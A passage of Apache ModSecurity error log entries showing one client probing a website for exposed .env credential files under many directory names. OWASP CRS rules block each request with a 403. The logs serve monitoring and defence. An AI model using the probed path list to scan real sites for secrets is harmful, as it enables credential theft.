"/svelte/.env"] [unique_id "agHHKuJEyNRN152ArORzjAAAAFI"]
[Mon May 11 14:10:18.572969 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHHKuJEyNRN152ArORzjAAAAFI"]
[Mon May 11 14:10:18.573262 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHHKuJEyNRN152ArORzjAAAAFI"]
[Mon May 11 14:10:18.846207 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHHKuJEyNRN152ArORzjQAAAFI"]
[Mon May 11 14:10:18.846581 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHHKuJEyNRN152ArORzjQAAAFI"]
[Mon May 11 14:10:18.846762 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHHKuJEyNRN152ArORzjQAAAFI"]
[Mon May 11 14:10:18.846997 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHHKuJEyNRN152ArORzjQAAAFI"]
[Mon May 11 14:10:19.183335 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHHK-JEyNRN152ArORzjwAAAFI"]
[Mon May 11 14:10:19.183717 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHHK-JEyNRN152ArORzjwAAAFI"]
[Mon May 11 14:10:19.183900 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHHK-JEyNRN152ArORzjwAAAFI"]
[Mon May 11 14:10:19.184129 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHHK-JEyNRN152ArORzjwAAAFI"]
[Mon May 11 14:10:19.512878 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHHK-JEyNRN152ArORzkAAAAFI"]
[Mon May 11 14:10:19.513276 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHHK-JEyNRN152ArORzkAAAAFI"]
[Mon May 11 14:10:19.513461 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHHK-JEyNRN152ArORzkAAAAFI"]
[Mon May 11 14:10:19.513684 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHHK-JEyNRN152ArORzkAAAAFI"]
[Mon May 11 14:10:19.772569 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHHK-JEyNRN152ArORzkgAAAFI"]
[Mon May 11 14:10:19.772973 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHHK-JEyNRN152ArORzkgAAAFI"]
[Mon May 11 14:10:19.773179 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHHK-JEyNRN152ArORzkgAAAFI"]
[Mon May 11 14:10:19.773450 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHHK-JEyNRN152ArORzkgAAAFI"]
[Mon May 11 14:10:20.103720 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHHLOJEyNRN152ArORzlgAAAFI"]
[Mon May 11 14:10:20.104117 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHHLOJEyNRN152ArORzlgAAAFI"]
[Mon May 11 14:10:20.104313 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHHLOJEyNRN152ArORzlgAAAFI"]
[Mon May 11 14:10:20.104566 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHHLOJEyNRN152ArORzlgAAAFI"]
[Mon May 11 14:10:20.362934 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHHLOJEyNRN152ArORzlwAAAFI"]
[Mon May 11 14:10:20.363340 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHHLOJEyNRN152ArORzlwAAAFI"]
[Mon May 11 14:10:20.363526 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHHLOJEyNRN152ArORzlwAAAFI"]
[Mon May 11 14:10:20.363768 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHHLOJEyNRN152ArORzlwAAAFI"]
[Mon May 11 14:10:20.682579 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHHLOJEyNRN152ArORzmAAAAFI"]
[Mon May 11 14:10:20.682966 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHHLOJEyNRN152ArORzmAAAAFI"]
[Mon May 11 14:10:20.683171 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHHLOJEyNRN152ArORzmAAAAFI"]
[Mon May 11 14:10:20.683383 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHHLOJEyNRN152ArORzmAAAAFI"]
[Mon May 11 14:10:20.963123 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHHLOJEyNRN152ArORzmQAAAFI"]
[Mon May 11 14:10:20.963517 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHHLOJEyNRN152ArORzmQAAAFI"]
[Mon May 11 14:10:20.963702 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHHLOJEyNRN152ArORzmQAAAFI"]
[Mon May 11 14:10:20.963946 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHHLOJEyNRN152ArORzmQAAAFI"]
[Mon May 11 14:10:21.271286 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHHLeJEyNRN152ArORzmgAAAFI"]
[Mon May 11 14:10:21.271665 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHHLeJEyNRN152ArORzmgAAAFI"]
